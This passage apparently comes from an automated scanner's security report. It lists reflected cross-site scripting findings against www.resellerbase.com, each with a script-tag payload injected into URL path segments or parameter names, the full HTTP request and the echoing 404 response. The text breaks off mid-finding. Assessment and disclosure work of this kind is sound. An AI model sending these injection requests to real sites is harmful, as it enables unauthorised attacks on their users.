This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/186088c<script>alert(1)</script>99663b3f148/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/186088c<script>alert(1)</script>99663b3f148/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1506. http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 92e95<script>alert(1)</script>f5d19630758 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/themes92e95<script>alert(1)</script>f5d19630758/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes92e95<script>alert(1)</script>f5d19630758/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1507. http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e381c<script>alert(1)</script>d282dcfe169 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/themes/kosmose381c<script>alert(1)</script>d282dcfe169/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/kosmose381c<script>alert(1)</script>d282dcfe169/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1508. http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 97690<script>alert(1)</script>1e351ef9ba8 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/themes/kosmos/images97690<script>alert(1)</script>1e351ef9ba8/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/kosmos/images97690<script>alert(1)</script>1e351ef9ba8/rating/ was not found on this server.</p>
...[SNIP]...

2.1509. http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/ [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload f275f<script>alert(1)</script>6a188e8e35e was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/themes/kosmos/images/ratingf275f<script>alert(1)</script>6a188e8e35e/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/kosmos/images/ratingf275f<script>alert(1)</script>6a188e8e35e/ was not found on this server.</p>
...[SNIP]...

2.1510. http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6b1d2<script>alert(1)</script>a55a5365ea4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/themes/kosmos/images/rating/?6b1d2<script>alert(1)</script>a55a5365ea4=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/kosmos/images/rating/?6b1d2<script>alert(1)</script>a55a5365ea4=1 was not found on this server.</p>
...[SNIP]...

2.1511. http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/0.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f171c<script>alert(1)</script>4cdd5609f9f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailf171c<script>alert(1)</script>4cdd5609f9f/18/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:34:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailf171c<script>alert(1)</script>4cdd5609f9f/18/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1512. http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/0.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8ed71<script>alert(1)</script>e96e3587bc4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/188ed71<script>alert(1)</script>e96e3587bc4/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:34:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/188ed71<script>alert(1)</script>e96e3587bc4/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1513. http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/0.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload db390<script>alert(1)</script>6672f4dc648 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/themesdb390<script>alert(1)</script>6672f4dc648/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:35:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themesdb390<script>alert(1)</script>6672f4dc648/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1514. http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/0.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 30700<script>alert(1)</script>271039ee35c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/themes/kosmos30700<script>alert(1)</script>271039ee35c/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:35:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/kosmos30700<script>alert(1)</script>271039ee35c/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1515. http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/0.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 7420e<script>alert(1)</script>09801fbd1 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/themes/kosmos/images7420e<script>alert(1)</script>09801fbd1/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:35:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/kosmos/images7420e<script>alert(1)</script>09801fbd1/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1516. http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/0.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 68df1<script>alert(1)</script>d5ba00b7b55 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/themes/kosmos/images/rating68df1<script>alert(1)</script>d5ba00b7b55/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:35:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/kosmos/images/rating68df1<script>alert(1)</script>d5ba00b7b55/0.gif was not found on this server.</p>
...[SNIP]...

2.1517. http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/0.gif [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 8a7f5<script>alert(1)</script>64a680a9940 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/themes/kosmos/images/rating/0.gif8a7f5<script>alert(1)</script>64a680a9940 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:35:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/kosmos/images/rating/0.gif8a7f5<script>alert(1)</script>64a680a9940 was not found on this server.</p>
...[SNIP]...

2.1518. http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/0.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/themes/kosmos/images/rating/0.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 28c9c<script>alert(1)</script>c5b54340a82 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/themes/kosmos/images/rating/0.gif?28c9c<script>alert(1)</script>c5b54340a82=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:33:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/kosmos/images/rating/0.gif?28c9c<script>alert(1)</script>c5b54340a82=1 was not found on this server.</p>
...[SNIP]...

2.1519. http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a1f42<script>alert(1)</script>324a86e6e34 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaila1f42<script>alert(1)</script>324a86e6e34/18/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaila1f42<script>alert(1)</script>324a86e6e34/18/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1520. http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cc6df<script>alert(1)</script>10d6c1ed541 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18cc6df<script>alert(1)</script>10d6c1ed541/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18cc6df<script>alert(1)</script>10d6c1ed541/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1521. http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ba4e3<script>alert(1)</script>75b558e9133 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/themesba4e3<script>alert(1)</script>75b558e9133/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themesba4e3<script>alert(1)</script>75b558e9133/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1522. http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f7423<script>alert(1)</script>3d93a7ee188 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/themes/kosmosf7423<script>alert(1)</script>3d93a7ee188/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/kosmosf7423<script>alert(1)</script>3d93a7ee188/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1523. http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f467f<script>alert(1)</script>36ea4786e0e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/themes/kosmos/imagesf467f<script>alert(1)</script>36ea4786e0e/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/kosmos/imagesf467f<script>alert(1)</script>36ea4786e0e/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1524. http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/themes/kosmos/images/rating/search.php

Issue detail

